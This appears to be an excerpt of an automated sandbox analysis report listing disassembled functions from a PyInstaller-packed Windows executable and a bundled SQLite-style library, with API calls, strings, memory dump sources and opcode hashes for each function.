                                                                                                                                                                                                                                              Function 00007FF6B7502390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                              • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                              • Instruction ID: 4f478c84f023a6a7181d3303189d0353c13e641d5c7a72d187cd9806adca5729
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1313D73A1DA8289EB209F29E8552F96360FF88788F440135EB4D8BB69DF3CD105C700
                                                                                                                                                                                                                                              Function 00007FF6B7502B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6B750918F,?,00007FF6B7503C55), ref: 00007FF6B7502BA0
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF6B7502C2A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                              • Instruction ID: da72ecbf80f5627dc225b90cb88e59fe1ea355414a45e7108239bb43256e7ea2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3121A16370CB8142E7219B58F8447EA73A4FB88784F400136EF8D97665EE3CE645C740
                                                                                                                                                                                                                                              Function 00007FF6B7502710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6B7501B99), ref: 00007FF6B7502760
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                              • Instruction ID: d27cc552cf225ce873c0c471e34702811d2bfd65f2871a6c7cb8a80559a5c1e7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5218173A1CB8142E7209B58B8417EA63A4FB88384F400136FF8D93669EF7CD2458740
                                                                                                                                                                                                                                              Function 00007FF6B7519A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                              • Instruction ID: c11d35822f8e28045bc73a05a74d7cffedf6ea7700be129f990a706eb62ee28a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7F06263B0DB4681EA108B28E48477A6330AF45761F540239D7AE865F4EF2CE188C340
                                                                                                                                                                                                                                              Function 00007FF6B7529368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                              • Instruction ID: 0b5d01ae10140f2002900cd2911e13b10286858eadec77d9e4a0ea4370827437
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0111F23E5CA0F42FA68136EE4A63791150AF69364F144634EBAEF67FACF6CA8414100
                                                                                                                                                                                                                                              Function 00007FF6B751B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3AF
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3CE
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3F6
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B407
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B418
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                              • Instruction ID: a25641608412af6962b6f90a1162dd7dc15549389ad82ead16ff0720a206439a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D119622F0DA2241F9559B2E594117962925F44BB2F488334DB7EC6EF6DD2CF8418300
                                                                                                                                                                                                                                              Function 00007FF6B751B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                              • Instruction ID: 2261d46ceb3bc7d2e9bc78e71854b9d4c6a5248508228b0b8a68ee9704f7abe9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF118E22E0D66341F9696B7E485117E12924F46B32F084B74DB7ECAEF3DD2DB8848301
                                                                                                                                                                                                                                              Function 00007FFE01389750 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 288COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FFE01389F87,?,00000007,?), ref: 00007FFE01389917
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                              • API String ID: 4225454184-2903559916
                                                                                                                                                                                                                                              • Opcode ID: c8e9e9d0493b56702fc431c37cfc446078fd1101c4b736dc5a6e1eecc87d744d
                                                                                                                                                                                                                                              • Instruction ID: fa96f5bcb70cc9619ae51e05ecc22615c34c238de490e23d32b4f45f52ece4e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8e9e9d0493b56702fc431c37cfc446078fd1101c4b736dc5a6e1eecc87d744d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37B19C22A1978285FF669B1594503BE6BA0EF85B98F4A4139DE5E0F7E5DF3CE805C300
                                                                                                                                                                                                                                              Function 00007FF6B7515FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction ID: f99eb74c11320d08b98c2a526d1315dc3e9ffcb2f44da47dced1f32cc0a6ef2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF91BC23A0CA6681FB618F28D45037E37A1EB40B96F854136DB5E83BE6DF3DE8458341
                                                                                                                                                                                                                                              Function 00007FFE013985A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFE01398A6F), ref: 00007FFE01398739
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFE01398A6F), ref: 00007FFE013987BB
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFE01398A6F), ref: 00007FFE013988AD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                                              • API String ID: 4225454184-2313493979
                                                                                                                                                                                                                                              • Opcode ID: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
                                                                                                                                                                                                                                              • Instruction ID: 74143dca9fb6ba3e254ad7b714f955f2d08801a91e535287899ccff2ee439e9c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84B18022A08B8586E720CF15D4402A97BA1FB96BE4F068375DEAD0B7E5DF3CE195C300
                                                                                                                                                                                                                                              Function 00007FFE0134D3D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFE01347847), ref: 00007FFE0134D52A
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFE01347847), ref: 00007FFE0134D554
                                                                                                                                                                                                                                              • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFE01347847), ref: 00007FFE0134D5A7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                              • API String ID: 4225454184-2852464175
                                                                                                                                                                                                                                              • Opcode ID: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
                                                                                                                                                                                                                                              • Instruction ID: 44d90c02aedbc3b2e68c0eeb502d725a2ade8b52cbc61981a3cd81087135fa23
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1391BD72B1964187EB248E55A04077A77A0FBA4BA4F564635DFAD0BBE8CF3CF4408B00
                                                                                                                                                                                                                                              Function 00007FF6B751FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction ID: 3fc33de8bb598934345648d721c902761075629d5de7b4a27321690c4a03c39b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7281D473E0E66385FBA49F2DC95027836A0AB11B4AF558535CB0AD7AF5CF2DED029301
                                                                                                                                                                                                                                              Function 00007FFE013893F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
